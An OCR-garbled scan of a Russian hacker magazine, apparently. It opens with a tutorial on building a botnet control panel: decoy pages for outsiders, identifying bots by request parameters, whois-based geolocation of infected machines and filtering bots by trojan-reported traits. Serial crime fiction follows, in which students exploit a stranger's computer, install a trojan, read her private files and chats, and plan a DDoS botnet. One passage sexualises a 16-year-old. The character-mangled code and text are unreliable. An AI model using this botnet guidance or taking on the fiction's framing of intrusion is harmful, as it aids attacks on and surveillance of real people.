В главном скрипте мы будем осуществлять проверку на кор- 
ректность обращения к сценарию. Обрати внимание, все боты 
при вызове скрипта соблюдают одни и те же правила: переда- 
ют 2 переменные через ОЕТ-запрос (іб и ехіепб), при этом не 
заполняют поле изег-адепЕ По этим двум критериям можно 
легко отделить реальных ботов от левых посетителей, кото- 
рые просто набрали в адресной строке ЕІВЕ управляющего 
скрипта. Вот как это выглядит примерно: 



і^(!сІіескЕуре($_6ЕТ[ісІ], "іб") ог ІсІіескІуре($_6ЕТ[ех1епб], "ехіепб”)) { 

# тут содержимое страницы, которую надо показывать всем левакам 
есііо "Добро пожаловать на сайт Петра Васильева. Мне 16 лет, 
учусь в десятом классе."; 

} еізе { 

# тут — работа с ботом. Вызов функций АббВоД), 6еІѴѴогк() и т.д. 

) 

Функция сИескІуре здесь — просто блок кода, который прове- 
ряет передаваемую строку на соответствие нашим собствен- 
ным типам «іб» и «ехіепб». Даже если чувак со стороны пой- 
мет, что страница, которую он видит — фэйк, то он никогда в 
жизни не вкурит, какие именно переменные и в каком форма- 
те нужно передать скрипту, чтобы он заработал с ним также, 
как работает с ботами. Однако все это ему не потребуется, ес- 
ли процесс передачи информации не будет никак защищен — 
стоит только отснифать ріаіп-іехі запросы и ответы, как все 
станет понятно. По этой причине для яростных параноиков мо- 
гу посоветовать использовать 58Е-шифрование трафика :). 




Т0_1Р ШТ N01 N011, 

С0^NТРIУ ѴАРІСНАРІ(2), 
СІТѴѴАРСНАВ(50), 

8ТАТЕРР0Ѵ ѴАРСНАРІ(2). 

Р08ТАІ ѴАРСНАР(8), 

А00РЕ88 ѴАВСНАРІ(ІОО)); 

Здесь используется, на самом деле, 
концепция кеширования запросов: 
ведь, получив один раз информацию 
об адресах определенной сети, глу- 
по записывать в таблицу лишь один 
адрес, вполне вероятно, что вскоре 
надо будет проверить еще одну ма- 
шину из этой же области. Поэтому 
вместо интуитивно ожидаемого поля 
"ІР" я использую два: "РНОМ_1Р" и 
"ТО_1Р", эти параметры определяют 
зарезервированный для сети проме- 
жуток адресов, который получается 
из параметра пеігапде. 

Такое кэширование позволяет оптимизи- 
ровать процесс определения местополо- 
жения клиентов. Чтобы не бытъ голослов- 
ным, приведу поскипанный пример кода: 

[определение географии 
клиента по ір] 




падающие о этим шаблонов строки 
будут помещаться в массив $аг. 
Как раз поэтому я присваиваю пе- 
ременной $сі1у значение $ат[1]. 
Когда я писал эту программу, у ме- 
ня возникла проблема: информация 
о различных адресах возвращалась 
в разных форматах. Все дело в том, 
что в зависимости от территориаль- 
ной привязки, информация об адре- 
сах хранится в различных организа- 
циях и почему-то не соблюдается 
единый стандарт. Я не большой 
знаток службы ѵѵітоіз, но меня это 
порядком удивило. К примеру, если 
сделать ѵѵПоіз 207.46.130.108, то по- 
ле со страной будет называться 
«Соипігу», а если ѵѵИоіз 217.1 0.40.1 , то 
«соипігу» — о маленькой буквы. 
Именно по этой причине ряд шабло- 
нов начинаются как [с1С]оип1гу, 
здесь символ вертикальной черты 
обозначает логическое "ог". 

В последней строчке напечатан- 
ного кода происходит запись ин- 
формации о сетевом диапазоне в 
таблицу Іосаііопз. 



создание и тестирование скрипта для определения географии 



$ф = рореп('ѵѵІіоі$ $ір, 'г'); # открываем пайп с процессом 
$геас1 = 1геаф$ф, 20480); # читаем поток вывода 
$Н=ехр1о0е(Ап", $геас1); 
рс1озе($ф); 

$по1=0; 

Іог($і=0; $і<соипІ($ІІ); $і++) { # в цикле по всем строкам 
іфегед(''^0гдNате: РІІРЕ Nе^\л^о^к Соогсііпаііоп Сеп1ге",$ІІ[$і])) 

і$по1=1 ;! # $по1 — флаг того, что информация об адресе находится на 

# другом сервере и будет использован несколько иной формат данных 
Щегед("''[сІС]оипІгу:[]{0,101([[:иррег:]]{2))",$ІІ[$і], $аг))| 
$соип1гу=$аг[1];# Извлекаем информацию о стране — двузначный код 
) 

Щегед("''СіІу:[ ]|0,10}([[:аірба:]]{1,30!)",$іі[$і], $аг)) { 

ІІ($поІ==0) $сі1у=$аг[1]; 

# о городе (часто вместо этого поля используется асісігевз) 

) 

Щегед("''81аІеРгоѵ:[ ]|0,101([[:аІрРа:]]{21)",$ІІ[$і], $аг)) I 
$зіа1е=$аг[1]; # штат 
) 

Щегед("''Роз1а1Собе:[ ]{0,10}([[:аІпит:]]|0,8})",$ІІ[$і], $аг)) I 
$роз1=$аг[1]; # индекс 
) 

ІI(е^ед("''Nе^Рапде:[ ]|0,1 01([0-9]|1 ,3)\.[0-9]{1 ,3)\.[0-9]|1 ,3).[0-9]{1 ,31) — 
([0-9]{1 ,31\.[0-9]{1 ,31\.[0-9]{1 ,3}.[0-9]|1 ,3))",$ІІ[$І], $аг)) { 
$ір_Ігот=$аг[1]; 

$ір_Іо=$аг[2]; # диапазон адресов 
) 

Щегед("''іпеІпит:[ ]|0,10}([0-9]{1,31\.[0-9]{1,3}\.[0-9]П,3).[0-9]{1,31) — 
([0-9]{1 ,3}\.[0-9]|1 ,31\.[0-9]{1 ,31.[0-9]{1 ,3))",$ІІ[$І], $аг)) { 
$ір_Ігот=$аг[1]; 

$ір_Іо=$аг[2]; 

) 

Щегед("''[а1А]с1с1гезз:[ ]{0,101(.{0,80!)",$ІІ[$І], $аг)) I 
$ас1с1г.=$аг[1].'\п"; # Адрес (в случае для не американского ір) 

)) 

тузді_диегу("іпзег1 іпЮ Іосабопз('$ір_1гот', '$ір_Іо', '$соипІгу', '$сі1у', 
'$зІа1е', '$розІ', '$аббг')"); # записываем информацию о диапазоне 

Здесь мы открываем пайп к созданному нами процессу ѵѵПоіз $ір и читаем в 
переменную $геас1 результат работы этой утилиты. Затем проходим по каждой 
строке результата и при помощи набора регулярных выражений получаем ин- 
тересующие нас поля о информацией. Покажу на примере как работают 
эти регулярные выражения. Возьмем, к примеру, вызов егед("''Сі1у:[ 
]{0,10}([[:аІрИа:]]{1,30})",$ІІ[$і], $аг). Этому шаблону соответствуют все строки, 
которые начинаются со слова «Сі(у:>> (символ '' перед этой цепочкой), после ко- 
торого обязательно идет от нуля до 1 0 пробелов, а затем последовательность 
из букв ([[:а1рИа:]]) длиной от 1 до 30 символов ({1 ,30}). Обрати внимание, что 
конструкция [[:а1рИа:]]{1,30} взята в круглые скобки, это означает, что все сов- 



[выводы] Я рассказал тебе о 
ключевых моментах создания системы управления ботами. Ты уже вполне 
можешь сам написать простенький сценарий с минимумом возможностей. 
Однако я также показал тебе, как прикрутить к системе определение геог- 
рафии пользователя, как реализовать сбор и хранение некоторых свойств 
бота, каким образом удобнее объединять ботов в различные группы. По 
большому счету, все самое главное я тебе рассказал. Осталось лишь реа- 
лизовать возможность фильтрации ботов по параметрам (скажем, по стра- 
не или городу), а также по передаваемым самим трояном свойствам бота 
(частота процессора, серый/белый адрес, объем жесткого диска и т.д.). Все 
это делается элементарно — простейшими манипуляциями с зді-запроса- 
ми и обработкой хті-документов. И о том, и о другом мы с тобой уже мно- 
го раз подробно говорили, поэтому проблем у тебя возникнуть не должно. 
В любом случае ты всегда можешь обратиться на наш диск и посмотреть, 
как это написал я. Удачи @ 
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«ПРЕПОДША МАРТА СЕРГЕЕВНА ШТУЦЕЛЬ МОНО- 
ТОННЫМ ГОЛОСОМ ДИКТОВАЛА МАТЕРИАЛ, И РОМЕ 
КАЗАЛОСЬ, ЧТО ОНА ВОТ-ВОТ ЗАСНЕТ, КАК И БОЛЬ- 
ШИНСТВО СТУДЕНТОВ В АУДИТОРИИ. КОМУ, В СА- 
МОМ ДЕЛЕ, НУЖЕН ЭТОТ НАСКАЛЬНЫЙ БРЕД? ЧИ- 
ТАТЬ ЕГО В ШКОЛЕ НА ИНФОРМАТИКЕ — ЕЩЕ КУДА 
НИ ШЛО, НО В МТУ НА ФАКУЛЬТЕТЕ, ГОТОВИВШИМ 
СЕТЕВЫХ СПЕЦОВ...» I ппіпсіѵуОгк (ппіпсіѵуОгк@датеІапсі.ги) 



н 

ш Приятели, сидящие рядом откровенно скуча- 

и ли. Саня Ма]ог выразительно зевнул и ллюх- 

нулся носом в конспект. Виталик вырисовы- 
вал дракончика. А Андрюха Огооѵе читал 
книжку Гибсона в оригинале. К облегчению 
студентов, бесполезная лекция продолжа- 
лась недолго, и вскоре всем было разрешено 
3 усвоить материал за компьютерами. Рома 

^ подмигнул Виталику, и тот понимающе кив- 

2 нул. Парни частенько выкидывали разные 



фокусы в сетке, подшучивая над одногруппниками и преподами. Нап- 
ример, однажды подбросили порнографическую картинку на волпа- 
пер админской машины, часто брали управление над компом одного 
из студентов, запуская там всевозможные приложения. За время, 
проведенное в локальной сети института, группе ЗІоѵѵ удалось найти 
столько дырок, сколько вряд ли отыщется во всей винде. Но ни разу 
хакеров не удавалось вычислить — они всегда сидели вместе в са- 
мом отделенном углу и, провернув шутку, заметали следы. 

Рома зашел в скрытую директорию, содержащую зашифрован- 
ный архив, распаковал его и запустил нужную утилиту. На компь- 




Часть вторая 




ютере появилась оболочка с командной строкой, в которой с по- 
разительной скоростью появлялись команды, отбиваемые паль- 
цами хакера. Через несколько секунд Рома уже был на админс- 
ком компьютере. Вставив дискету с фрагментом песни Порнорэп 
«Аты-Баты», он скопировал ее сначала на свой комп, потом залил 
на комп админа. Осталось только врубить громкость на полную и 
запустить в винампе музон. 

В этот момент аудитория вздрогнула — из админских колонок раз- 
дался текст, разбавленный наполовину матом: «Меня ввязали слу- 
жить в ох#$нный стройбат, и я сразу попал с лопатой в наряд». Мар- 
та Сергеевна побледнела и, вскочив со своего стула, 
бросилась к компу админа. Найти, выключить в колон- 
ках звук заняло у нее 10 секунд, в течение которых ра- 
достно возбужденные студенты услышали из динами- .... 

ков еще пачку матерных слов. 

— Сергей, ты охренел? — забыв про приличия, накину- 
лась на админа преподша, но тот лишь растерянно 
глазел на нее, выражая полное непонимание. 

По его виду Марта Сергеевна сообразила, в чем дело, 
со злостью оглядела аудиторию и удалилась за дверь. 

— Что-то будет..., — услышал Рома голос одногруппника. 

К тому времени, как админ принялся штудировать логи 
выискивая аномалии, Оагк Зігапдег уже вышел из системы 
и, запустив ТигЬо РазсаІ, набирал заданную программу. 



Я конечно не ответила. Я же не Друздь какой-нибудь, чтоб такое 
знать. Когда истек таймер, окно сообщило, что меня ждет наказание. 
— Там было сказано, какое именно наказание? 

— Нет. Скно просто пропало. Я первым делом, конечно, подумала 
на нашего компьютерщика Юру. Но он отнекивался. А потом... 
Женщина обреченно посмотрела на Кирякина. 

— Продолжайте — потребовал следователь. 

— . . .потом посыпались жалобы. Сдному клиенту вместо номера люкс 
на Бермудах забронировали захудалый номер в трехзвездочном оте- 
ле. Путевка другого оказалась на 5 дней короче, чем было заказано. 



Кирякин поздоровался с сотрудниками и прошел к се- 
бе в кабинет, отдав по пути пару указаний. Свой рабо- 
чий понедельник следователь решил начать с горяче- 
го кофе. Достав из стола чашку с причудливыми узо- 
рами, которую жена подарила на 23 февраля, он спо- 
лоснул ее в раковине, высыпал в нее пакетик Ыезсаіе 
и, налив воды в миниатюрный электрочайник, вклю- 
чил его в разетку. Пока закипала вода, Кирякин загру- 
зил компьютер и проверил почту. Среди скучных отчетов было 
то, что он надеялся увидеть — подборка информации по хакерам, 
которые могли быть замешаны в инциденте с Овчинниковым и 
Потаповым. Завербованные хакеры честно отрабатывают свою 
амнистию. Распаковав архив в рабочую папку, следователь при- 
нялся изучать инфу. В этот момент в дверь постучали. 

-Да? 

В дверь зашел сотрудник отдела Мишка. 

— Шеф, у нас посетительница. Похоже, новая жертва Нострадамуса. 
Так между собой в отделе называли хакера, который загадывал за- 
гадки. Почему именно Нострадамус Кирякин не знал, наверное по- 
тому, что он был таким же загадочным, как древний предсказатель. 
— Пригласи ее ко мне. 

Он оказался прав. Хакер решил не ограничиваться двумя жертва- 
ми. Прямо серийный насильник. Только не маленьких девочек, а 
компьютеров бедных юзеров. 

Новой жертвой оказалась миловидная брюнетка лет 25-ти в костю- 
ме, выразительно облегающем стройную фигуру. 

— Здравствуйте, меня зовут Елена Андреевна — представилась она. 
— Вадим Сергеевич — привстав с кресла, ответил Кирякин. -При- 
саживайтесь, Елена. И расскажите, что вас к нам привело? 
Брюнетка присела на стул и нерешительно огляделась, очевидно, 
думая, с чего ей начать. 

— Мне сказали, что ваш компьютер атаковал хакер? — подс- 
казал Кирякин. 

— Я даже не знаю. Я никогда раньше не имела дела с хакерами. 
Просто эта задача... я не знаю, откуда она появилась на экране и 
что это значит. 

— Расскажите обо всем по порядку. 

— Я работаю в турагентстве «Колумб». Мы специализируемся на 
путешествиях в экзотические страны. Ну, знаете, Непал, Новая 
Зеландия. Моя задача — обработка заказов на компьютере. До- 
пустим, клиенту хочется отправиться в Индию. Он называет вре- 
мя, когда ему удобно, и я по базе данных сверяю, что мы можем 
ему предложить, во сколько это обойдется, каким будет маршрут 
и так далее. Я тогда работала как обычно, и вдруг появилось это 
окно. Я сначала подумала, что это кто-то из конторы шутит. Раз- 
ве я могла знать, что все так обернется? 

— Поподробнее, пожалуйста. 

— В окне мне предлагалось за определенное время ответить на воп- 
рос, касающийся традиций жителей страны, которую мы представля- 
ли. Дословно я уже не помню. Нужно было сказать, для поднятия в 
себе чего туземцы исполняют этот танец... рики-нуки или рики-наки. 
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А один вместо острова Тасмания попал на Новую Каледонию!! 

— Позвольте, а каким образом он умудрился попасть вместо Тас- 
мании в Каледонию? 

— Все дело в базе данных. Именно в нее заносятся все условия поезд- 
ки, и данные потом отсылаются представителям на месте курорта. 

— То есть кто-то изменил базу данных? 

— Да! Но мне никто не верит — начальник считает, что это я во всем 
виновата. Теперь я осталась без работы. 

— Когда все это произошло? 

— Чуть больше месяца назад. 

— Месяц назад?? Почему вы сразу не обратились к нам? 

— Да я не знала к кому обратиться. А в субботу посмотрела переда- 
чу с вашим участием. Сначала я не думала, что это может быть ха- 
кер, а теперь я уверена в этом! 

— Елена Андреевна, вам нужно будет описать все, что вы мне рас- 
сказали, на бумаге. Со всеми подробностями. 



Кирякин вышел на крыльцо здания отдела «К». Здесь уже ку- 
рили его ребята. 

— Ну что, шеф, есть идеи насчет Нострадамуса? — спросил Мишка. 
— Это я у тебя должен спросить. По поводу идей. 

— Чего-то с идеями глухо. 

Кирякин достал сигарету и прикурил у одного из парней. 

— Знаете, о чем я думаю? Овчинников и Потапов — достаточно пуб- 
личные люди. Хакер вполне мог увидеть их по телеку или прочитать 
о них в газете. Но эта турагентка... откуда он узнал про нее? 

— А с чего ты взял, что между ними есть связь? Он мог просто вый- 
ти на нее, просканировав случайный диапазон !Р. 

— Сдается мне, своих клиентов он подбирал не случайно. 

— Предположение? 

— Скорее чуйка. 

Следователь затянулся и задумчиво посмотрел на небо. 



Возвратившись в свой кабинет, Кирякин продолжил изучение прис- 
ланной инфы по хакерам. Несмотря на то, что взломы мог совер- 
шить любой из списка, реальных зацепок не было. Да и инфа была 
не совсем такой, какая его интересовала. Завербованный хакер 
разложил по полочкам, где в инете обитают его приятели, насколь- 
ко силен уровень их знаний, какую репутацию имеют в хакерской 
среде и прочее. Следователь бы с большим интересом почитал, 
чем они занимались последнее время. 
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Монитор почтовых сообщений пискнул, объявляя, что в рабочий 
ящик пришло новое письмо. Кирякин открыл его и увидел силико- 
ногрудую голую девицу, крупным шрифтом зазывающую: «Сделаю 
все, что пожелаешь. Студентам скидки. Звони: ХХ-ХХХ-ХХХ». Сле- 
дователь выделил мессагу и нажала «Оеіеіе». Спамеры совсем ох- 
ренели, даже до его рабочего ящика добрались. Пора их брать за 
яйца. Конечно, всех не кастрируешь, но в образовательных целях 
остальных, парочку можно. 

Кирякин вспомнил, как впервые пришел в отдел. Он давно хотел 
работать с компьютерными преступлениями — от маньяков, на- 
сильников и прочей мрази, которую ему доводилось встречать в 
уголовном, тошнило и он понимал, что это не его. В то же время 
расследование компьютерных дел требовало не только сообрази- 
тельности, но и компетентности в технике. Пройдя курс подготовки, 
Кирякин попросился в отдел «К», тогда еще носивший другую бук- 
ву. Днем делал непыльную бумажную работу под руководством 
своего начальника Дмитрия Чепчугова, а по вечерам изучал внут- 
реннее устройство компьютеров и сетей. Следователю, которым 
собирался стать Кирякин, это знать не обязательно, но он не хотел 
быть профаном в своей области, и хоть и с трудом, со скрипом, по- 
тихоньку осваивал «китайскую грамоту». Потом Чепчугов оставил 
отдел, и Кирякин стал лучшим кандидатом на должность следова- 
теля. Он помнил свое первое раскрытое здесь крупное дело, как 
будто это произошло вчера. Хакер с ником НеІІгізег взломал компь- 
ютерную сеть коммерческой компании и, связавшись с руководите- 
лем, потребовал 25 тысяч баксов, иначе обещал разрушить всю 
сеть, нанеся ей максимум вреда. Директор обратился в отдел «К» 
и так получилось, что это дело стало первым после занятия Киря- 
киным места следователя. Вычислить хакера через компьютер не 
представлялось возможным — с шефом фирмы он связывался по 
мылу через левый ящик, а перевод денег указал осуществить на 
электронный счет в Малайзии, отследить который было невозмож- 
но. Кирякин решил заманить хакера в ловушку, сказав шефу фир- 
СО мы, чтобы тот согласился перевести деньги, но на счет в другом 
банке. В одном из тех, с которыми якобы работала компания. Жад- 
ность пересилила в хакере осторожность, и он согласился. 
НеІІгізег’а взяли прямо на месте, когда он пытался обналичить часть 
суммы. С тех пор в архиве раскрытых Кирякиным дел были десят- 
ки компьютерных преступлений. Начиная банальным воровством 
диалапа неимущими студентами, заканчивая инцидентом взлома 
внутренней компьютерной сети МВД. Дело Нострадамуса было са- 
о мым интересным за последнее время. 

§ От воспоминаний Кирякина оторвал телефонный звонок, 
ш — Вадим Кирякин. Слушаю. 

^ — Еще раз здравствуйте. Это Елена. Я к вам приходила сегодня ут- 

^ ром. — послышался в трубке знакомый женский голос. 

— Дада, конечно Елена, я вас помню. 



— Я тут подумала... в общем, я забыла вам сказать, что неза- 
долго до того, как хакер напал на базу данных, у нас был теле- 
визионный эфир, где я рекламировала услуги нашей фирмы. У 
меня совсем вылетело из головы, но сейчас я подумала, может 
быть это как-то связано. 

— Телевизионный эфир? По какому каналу? 

— Р-ТѴ. Канал новый и еще не набрал достаточно популярности, 
поэтому там пока недорогая реклама, и мы этим воспользовались. 
Кирякину не нужно было объяснять, что такое Р-ТѴ. Сюжет, где он 
рассказывал о своей работе, крутился именно по этому телеканалу. 
— Не помните, когда именно крутили вашу рекламу? 

— Чуть более месяца назада... если я не ошибаюсь, 13 апреля. 

— Спасибо Елена. Возможно, это поможет. 

— Я очень надеюсь. Всего доброго. 

Кирякин положил трубку. С тем же успехом она могла позвонить и 
сообщить, что перешла в тот день улицу на красный свет, после че- 
го последовал взлом. 

Следователь перевел взгляд на монитор и замер. СиІІоок Ехргезз с 
открытым в нем письмом загораживало большое окно, внутри кото- 
рого находился текст: 

«Здравствуйте, господин Кирякин. 

Вы весьма опытный следователь и раскрыли немало компьютерных 
дел, поэтому я думаю, вам не составит труда раскрыть еще одно. 
Сбычно я даю людям минуту, чтобы разгадать загадку. У вас есть 24 
часа. Мой вопрос вы не раз задавали себе сами. Кто я? Найдите на 
него ответ за указанное время, или вас ждет наказание» 

Чуть ниже таймер отсчитывал время. 



— Ну что там? — нетерпеливо спросил следователь. 

— Чисто, шеф. Скно было запущено скриптом в реестре, как там 
этот скрипт появился неизвестно. Кроме него нет никаких следов 
троянов, жучков и вообще следов постороннего вмешательства, — 
оторвался от внутренностей компьютера Кирякина техэксперт Саня 
Г ришко. 

— То есть ты хочешь сказать, что по нашим компьютерам может 
бродить любой школьник? 

— Любой — нет. Если у «школьника» двоичные коды в голове, он в 
любую сеть найдет лазейку. 

— Ладно, свободен. 

Кирякин чувствовал себя дураком. Он расследовал преступления, 
в которых компьютеры жертв взламывали, использовали для 
взлома других компьютеров, воровали с них или вовсе удаляли 
инфу. Он всегда проводил лекцию на тему: «Нужно заботиться о 
безопасности своего компьютера». И в итоге сам оказался в поло- 
жении жертвы. Хуже того, у него по прежнему не было ни одной 
зацепки, и он не представлял, где искать этого хакера. Как и не 



представлял, какое наказание уготовил ему Нострадамус. 

К обеду о взломе компьютера Кирякина знал весь отдел. Следова- 
тель был весь на нервах и требовал от сотрудников результатов. 
Напряженная обстановка продлилась до конца рабочего дня. 



О баре «Белый аист» знали немногие. Он находился в подваль- 
чике одного из домов, причем со стороны внутреннего дворика, а 
не оживленной улицы. Среди постоянных посетителей бар сла- 
вился вкусным пивом и уютной обстановкой, располагающей к 
общению. Хакеры из 8Іоѵѵ часто здесь бывали — сейчас они си- 
дели за дальним столиком и изучали меню. У Огооѵ’а была еще 
одна причина приходить сюда — 1 6-летняя официантка Анечка, к 
которой он питал светлые чувства. Она была всегда приветлива 
и улыбчива, нередко кокетничала с мужчинами. «Немного под- 
растет, я на ней женюсь», — говорил Андрюха, но делать первый 
шаг к более близкому знакомству не спешил. Вернее, не знал, 
как его лучше сделать. Приятели частенько подшучивали над 
ним, называя «Ромео», на что Андрюха вечно обижался. На сто- 
ле, наконец, появились пиво и закуски. 

— Были сегодня на бантраке? — спросил Оагк Зігапдег. 

— Еще не смотрел, вечером гляну. 



Саня достал свой Азиз 8300М, быстро нашел хотспот подключения 
к Сети, обошел систему аутентификации и зашел на сайт бантрака. 
Исходник эксплойта был на языке С и содержал небольшие изме- 
нения в коде, чтобы если он случайно попадет в руки ламера, тот не 
смог его откомпилировать. Саня быстро просмотрел код, нашел 
место, которое нужно было подправить, и стравил его компилятору. 
— На ком будем тестировать? — поинтересовался он у приятелей. 
— Давай какую-нибудь тетку с дамочки. 

Дамочка.ру был излюбленным рассадником жертв для группы 8Іоѵѵ. 
Там можно было найти не только кучу «леммингов», как называли ма- 
лограмотных компьютерщиков хакеры, но и всю нужную инфу о них. 
На первой же, индексной, странице находилась фотка красотки с 
ником 81е11а в оранжевом топике и ярко красных кожаных штаниш- 
ках, выгнувшаяся для пущего ракурса. 

— Сойдет? — спросил Ма]ог. Но вопрос был скорее риторическим. 
Саня открыл ее профайл, нашел номер аськи и проверил его на 
ѵѵІіИе радез. Девочка сидела в онлайне. Для того, чтобы узнать ее 
ІР, потребовалась пара секунд. 

— А если у нее Орега? — высказал предположение СосІеМазіег. 

— Это мы сейчас узнаем. 

Пошаманив немного в консоли, Саня запустил эксплоит... все сра- 
ботало, как часы. Оставалось только вписать линк на троян, кото- 
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— я тоже. 

Вапігаск был своеобразным аналогом известной зесигііу-ленты 
Ьидігад, с той разницей, что ее читателями и составителями были в 
основном, так называемые, блэк хэты. Компьютерные взломщики, 
вирусмейкеры и ІТ аферисты всех мастей. Эта рассылка являлась 
закрытой для посторонних, подключиться к ней можно было только 
после рекомендации других мемберов. 

— Рііоепіхх нашел новую дырку в осле и уже опубликовал эксплойт. 
— Что за дырка? 

— Майкрософт как всегда облажались, на этот раз с загрузочным 
урлом. В последних версиях эксплорера можно удаленно прописать 
любой урл в строке хоумпаги. И когда юзверь запустит своего ос- 
лика, он попадает в гости к нам. 

— Халява для спамеров. 

— Не только для спамеров. Можно написать червячка, который авто- 
матически будет находить уязвимые проги и прописывать в них пря- 
мую ссылку на троян. Чтоб он сразу загружался в память. Ну, а кли- 
ентом потом мониторить все эти компы и юзать их для своих целей. 
— Думаю, завтра-послезавтра уже прикроют. Я слышал, на бантра- 
ке крутятся админы с маздая. 

— К тому времени, как прикроют, троян уже будет на тысячах ком- 
пов. В общем, предлагаю сегодня заняться, и ночью запустить чер- 
вячка. Если мы добавим новый урожай к тем нодам, что у нас уже 
есть, это будет около миллиона компов. С такой оравой можно лю- 
бой сайт завалить за пару секунд. Хоть доодіе, хоть спп.сот. 

— У меня ноут с собой. Можем потестить сейчас — предложил Маіог. 
— Доставай. 



рый находился на их сайте. И с помощью другого эксплоита, зак- 
рыть на удаленном компьютере браузер. 

Через несколько секунд хакеры уже хозяйничали на компьюте- 
ре девушки. 

— Хрена себе у нее говна разного — воскликнул Ѳгооѵе глядя на 
чуть ли не сотню папок в корне. 

—Открой МУ„В0УРВ1ЕМ08. 

Внутри оказалось еще штук 50 директорий, носивших мужские имена. 
— Во, заходи в РОМА, — посоветовал Рома Оагк 81гапдег. 

— Нее, лучше в Ѵеіаіік, — отозвался Виталик СобеМазІег. 

— Парни, вы в пролете. Тут 6 папок с именем Апбге], — победонос- 
но посмотрел на друзей Ѳгооѵе. 

Маіог открыл одного Андрея. Внутри было несколько фоток какого- 
то голого 50-летнего дедугана со всеми причиндалами наружу. На 
фотографиях остальных парней тоже были исключительно обна- 
женные натуры. Видно, у дамочки было такое своеобразное хобби 
— коллекционировать фотки своих любовников. 

— Чего там еще интересного есть? 

— Открой-ка МУ_РОЕТРУ. 

— Я лежала на кроватке, в обнимку с котом. И пришел, пришел он 
потом. И обнял меня, откинув кота. И я сказала: «Да!» — вырази- 
тельно стал читать первый стих Саня. 

Все дружно засмеялись, а Рома даже поперхнулся пивом. 

— Похоже с ней все ясно. 

— Да, не завидую ее следующему бойфренду. 

Маіог проверил сетевую активность на девочкином компьютере. 

— Ба, да она с кем-то сейчас чатится по аське! 
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— Показывай, чего ждешь! 

Саня открыл лог, обновляемый в реальном времени. И все снова 
прыснули от смеха. Внутри шел виртуальный секс, причем с такими 
подробностями, которым позавидует любое реальное порно. 
Официантка Аня с интересом поглядывала на кучку молодых 
ребят, которые сгрудились вокруг ноутбука и о чем-то оживлен- 
но шушукались. Она уже привыкла к ним, но не понимала, что 
интересного можно находить в этой железяке. Аня пару раз ра- 
ботала в интернете, и для нее это было все равно, что попасть 
в джунгли. Да, вокруг много непонятного и любопытного, но 
больше всего хотелось побыстрее выбраться. Ей было интерес- 
но, какие чувства в сетевых джунглях испытывает кампания 
этих ребят. 



Вернувшись домой, он сел за компьютер и первым делом проверил 
ящик. В числе других сообщений была краткое оповещение, что 
скрипт запущен. Значит, мент получил его послание. 

Он еще раз провернул в мозгу все свои взломы. Не допустил ли он 
где-то ошибки, не оставил ли следов. Нет, все было чисто. Какими 
бы сообразительными и пронырливыми не были следователь и его 
люди, им не удастся его найти. Ни за 24 часа, ни за 24 года. 

Он зашел в папку Рогпо, выбрал один из мувиков, и запустил на 
воспроизведение. На экране появилась развратная блондинка в 
сопровождении двух негров. Вскоре все трое остались без одежды, 
один оказался впереди, другой пристроился сзади. Из колонок раз- 
дались женские стоны. 

Он представил на месте блондинки официантку Анечку из бара и 
сразу почувствовал эрекцию. Не в силах больше терпеть, он рас- 
стегнул ширинку. 



Пока машина стояла в послерабочей пробке, Кирякин думал. До 
недавнего времени он относился к Нострадамусу как к очередно- 
му хакеру, которого нужно поймать. Теперь это дело касалось его 
лично. Кирякин представил, как должно быть веселился хакер, 
когда вживлял в его компьютер свой скрипт. Если ему не удастся 
поймать этого Нострадамуса, ему нечего делать в отделе. Следо- 
ватель вспомнил свои слова, сказанные по телевизору: «Только 
очень глупый человек попытается взломать компьютер сотрудни- 
ка отдела по компьютерным преступлениям. Основная задача ха- 



кера — не попасться в наши руки, но если кому-то не терпится с 
нами познакомиться, атаковать наши компьютеры — отличный 
способ это сделать». 

Кирякина неожиданно как током ударило. А что если хакер смотрел 
эту передачу? И она стала для него как красная тряпка для быка. 
Та дамочка из турагентства тоже выступала по В-ТѴ... может быть 
остальных жертв он взял оттуда же? 

Сзади послышалось недовольное бибиканье. Задумавшись, Киря- 
кин не заметил, что стоит на зеленом свете, задерживая движение. 
Включив газ, он вырулил с перекрестка и остановил машину у тра- 
туара. Затем взял мобильник и набрал номер справочной. 

— Телефон телеканала В-ТѴ, будьте добры. 

Оператор продиктовала ему, номер и Кирякин тут же ввел его в те- 
лефоне. В трубке послышался резкий женский голос: 

— Телеканал В-ТѴ. 

— Здравствуйте. Вас беспокоят из отдела МВД по борьбе с компь- 
ютерными преступлениями. Следователь Вадим Кирякин. 

— Чем могу вам помочь? 

— Я хочу получить информацию. 

— Какого рода информацию? 

— Скажите, за последний месяц были ли у вас сюжеты, где фигури- 
ровали профессор математики Сергей Овчинников и министр обра- 
зования Дмитрий Потапов? 

— Минуту подождите. 

Минута затянулась на все 5, Кирякин терпеливо ждал. Наконец в 
трубке снова послышался тот самый голос. 

— Да, вы правы. У нас был сюжет о достижениях русских математи- 
ков 18 апреля, где давалось выступление вашего профессора, и 
пресс-конференция с Потаповым 23 апреля. 

— Большое вам спасибо. Вы мне очень помогли. 

Кирякин нажал отбой. 

Ну вот. А говорят, хакеры не смотрят телевизор. Пока следователь 
не знал, что дает ему эта информация. В-ТѴ хоть и новый канал, но 
смотрят его тысячи людей, не будешь же проверять всех. Все же 
Кирякин не сомневался, что скоро выйдет на след. 



Лариса хозяйничала на кухне, подогревая мужу ужин. Кирякин в 
это время пересматривал запись телепередачи, в которой участво- 
вал. Что-то не давало ему покоя. Что-то было не так, но что, он не 
мог сказать. 



Жена объявила с кухни, что ужин готов, и они вместе перекусили. 
— А где Машка? — спросил глава семейства. 

— Она утром предупредила, что задержится. У них там в художке 
какая-то репетиция. А у тебя как на работе? 

— Да ничего особенного. Решу дело, над которым сейчас работаю, 
и, пожалуй, возьму отпуск на пару недель. 

— Правда? Может, съездим куда-нибудь? Я бы тоже взяла, мы так 
давно не выбирались никуда из Москвы. 

— А куда ты хочешь? 

— На море, в Крым. Сто лет там не была. 

— Сейчас же не сезон? 

— Зато там чистый воздух и природа. 

— Ну что ж, в Крым — так в Крым. 

На улице постепенно начинало темнеть, а Машки все не было. Ла- 
риса уже начала волноваться и ходила кругами вокруг Кирякина. 
— Надо поговорить с преподавателями. Это нормально, допоздна 
детей держать? Как она сейчас домой добираться будет? 

— Да не волнуйся ты, у нас дочка взрослая, не потеряется. 

Но через час волноваться уже начал сам Кирякин. 

— Я звоню преподавательнице, — наконец, не выдержал он. 

Номер Антонины Михайловной был у них в телефонной книжке. Но 
когда Кирякин дозвонился до нее и стал выяснять, где дочь, жен- 
щина с удивлением сказала, что Маша давным-давно ушла из ху- 
дожественной школы домой. 

— Сна не говорила, что куда-то собирается зайти? 

